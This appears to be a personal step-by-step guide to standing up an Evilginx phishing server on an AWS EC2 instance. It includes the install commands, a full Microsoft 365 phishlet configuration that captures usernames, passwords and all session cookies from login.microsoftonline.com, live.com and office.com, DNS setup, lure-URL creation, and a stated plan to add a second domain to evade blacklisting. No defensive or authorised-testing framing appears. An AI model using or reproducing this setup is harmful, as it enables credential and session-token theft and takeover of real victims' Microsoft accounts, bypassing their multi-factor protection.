Phishing Domain 1 Evilginx

Setting up the domain1

Setting up the nameservers ~ Route53

Setting up the VPS ~ EC2

Ubuntu free tier
Generate ssh key pair

Network Settings

configuring the ssh to local computer ip

curl http://ipinfo.io/ip 

and http/s and DNS from 0.0.0.0 (anywhere) ~~> Launch

setting up evilginx in instance

sudo apt update
#INSATLLING GO
cd ~
curl -OL https://golang.org/dl/go1.21.6.linux-amd64.tar.gz
sha256sum go1.21.6.linux-amd64.tar.gz
sudo tar -C /usr/local -xvf go1.21.6.linux-amd64.tar.gz
sudo nano ~/.profile
### adding this
## export PATH=$PATH:/usr/local/go/bin
source ~/.profile
go version

git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo ./build/evilginx -p /phishlets/

## help ~~ ## config domain 1 ~~ ## config ipv4
### domain pointing to instance public ip
## setting up the phishlets
## phishlets hostname m365 domain1
## phishlets enable m365

phishlets in my case is m365

min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session:true, is_landing: true}
  - {phish_sub: 'logon', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: true, is_landing: false}
sub_filters:
auth_tokens:
  - domain: '.live.com' #domain that sends the cookie
    keys: ['.*:regexp'] #name of cookie to steal
  - domain: 'live.com'
    keys: ['.*:regexp']
  - domain: '.login.live.com'
    keys: ['.*:regexp']
  - domain: 'login.live.com'
    keys: ['.*:regexp']
  - domain: '.login.microsoftonline.com'
    keys: ['.*:regexp']
  - domain: 'login.microsoftonline.com'
    keys: ['.*:regexp']  
  - domain: '.microsoft.com'
    keys: ['.*:regexp'] 
  - domain: 'microsoft.com'
    keys: ['.*:regexp']
  - domain: '.office.com'
    keys: ['.*:regexp']
  - domain: 'office.com'
    keys: ['.*:regexp']
  - domain: '.www.office.com'
    keys: ['.*:regexp']
  - domain: 'www.office.com'
    keys: ['.*:regexp']
auth_urls:
  - '/landingv2'
credentials:
  username:
    key: 'login'
    search: '(.*)'
    type: 'post'
  password:
    key: 'passwd'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/' # path to where the login is, on the domain.    

pointing subdomains of domain 1 to phishlets subdomain

login
logon and
www ~~> to the domain1 ip that is the instance ip running the server

creating lures in evilginx

## in evilginx
lures create m365
lures get-url <id>

Adding another domain to prevent BLACKLISTING

Adding another apache server

Next part in domain 2